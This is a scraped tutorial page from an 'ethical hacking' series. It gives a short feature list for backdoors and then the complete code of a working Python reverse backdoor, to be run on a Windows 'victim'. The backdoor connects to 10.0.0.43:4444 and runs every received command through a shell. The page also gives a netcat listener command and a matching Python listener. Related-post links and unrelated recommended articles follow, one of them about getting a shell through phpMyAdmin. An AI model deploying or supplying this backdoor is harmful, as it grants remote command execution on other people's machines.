REVERSE_BACKDOOR

  • Access file system.
  • Execute system commands.
  • Download files.
  • Upload files.
  • Persistence.

BACKDOORS

An interactive program gives access to a system its executed on.

  • Command execution.
  • Access file system.
  • Upload/download files.
  • Run keylogger.
  • ...etc

Write the Reverse backdoor Python script and execute on Windows machine. (Victim machine)

#!/usr/bin/env python

import socket

import subprocess

def execute_system_command(command):

    return subprocess.check_output(command, shell=True)

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connection.connect(("10.0.0.43", 4444))

connection.send(b"\n[+] Connection established.\n")

while True:

    command = connection.recv(1024).decode()

    command_result = execute_system_command(command)

    connection.send(command_result)

connection.close()

Run the listening progress on the Kali Linux to establish the connection and execute the system commands.

nc -vv -l -p

Write and execute the Python Listener:

#!/usr/bin/env python

import socket

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

listener.bind(("10.0.0.43", 4444))

listener.listen(0)

print("[+] Waiting for incoming connections")

connection, address = listener.accept()

print("[+] Got a connection from " + str(address))

while True:

    command = input(">> ").encode()

    connection.send(command)

    result = connection.recv(1024).decode()

    print(result)

Python Ethical Hacking - BACKDOORS(1)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(3)

    BACKDOORS Sockets Problem: TCP is stream-based. Difficult to identify the end of message/batch. Solu ...

  3. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  4. Python Ethical Hacking - BACKDOORS(6)

    File Upload: A file is a series of characters. Uploading a file is the opposite of downloading a fil ...

  5. Python Ethical Hacking - BACKDOORS(5)

    File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read th ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. JavaSE之流程控制结构

    流程控制语句结构 一.顺序结构 public static void main(String[] args){     //顺序执行,根据编写的顺序,从上到下运行     System.out.pri ...

  2. cb27a_c++_STL_算法_最小值和最大值

    cb27a_c++_STL_算法_最小值和最大值min_element(b,e) b--begin(), e--end()min_element(b,e,op). op:函数,函数对象,一元谓词.ma ...

  3. vs2017离线包下载获取方法

    一.去官网下载所需要的版本的安装包获取程序: https://www.visualstudio.com/zh-hans/downloads/ 三个版本,对应文件名称为: 社区版:vs_Communit ...

  4. CVE-2018-12613 phpmyadmin文件包含getshell连载(三)

    这是phpmyadmin系列渗透思路的第三篇文章,前面一篇文章阐述了通过慢查询日志getshell,本文将通过文件包含漏洞展开讨论 #001 影响版本 Phpmyadmin 4.8.0/4.8.0.1 ...

  5. MySQL 视图 事务 索引 外连接

    视图 1.定义 select 语句的结果集,是一张虚拟的表2.创建视图语句create view 视图名 as select语句3.查看视图show views;4.使用视图select * from ...

  6. 使用git畅游代码的海洋

    如果把互联网上的纷繁代码比作一片海洋,那么git就是在这片海洋上航行的船只,正所谓“水可载舟,亦可覆舟”,git使用恰当可以远征星辰,不然可能会坠入无穷无尽的代码海洋无法自拔.书回正传,我们的征途是星 ...

  7. skywalking中表字段的信息

    https://skyapm.github.io/document-cn-translation-of-skywalking/zh/6.2.0/concepts-and-designs/scope-d ...

  8. JavaWeb网上图书商城完整项目--day02-21.退出功能的实现

    1.当用户点击退出的时候,跳转到登陆页面 当用户点击退出的时候,需要将session中保存的登陆的用户销毁掉 当用户点击退出的时候,调用UserServlet的quit方法 退出按钮在top.jsp中 ...

  9. struct2面试准备

    二 工作流程1.客户端浏览器发出HTTP请求.2.根据web.xml配置,该请求被FilterDispatcher接收3.根据struts.xml配置,找到需要调用的Action类和方法, 并通过Io ...

  10. Python初识类与对象

    Python初识类与对象 类与对象 世界观角度分析类与对象 类是一个抽象的概念,而对象是一个实体的存在,对象由类创造而出,每个对象之间互相独立互不影响,一个对象可以同时拥有多个类的方法,实例化就是通过 ...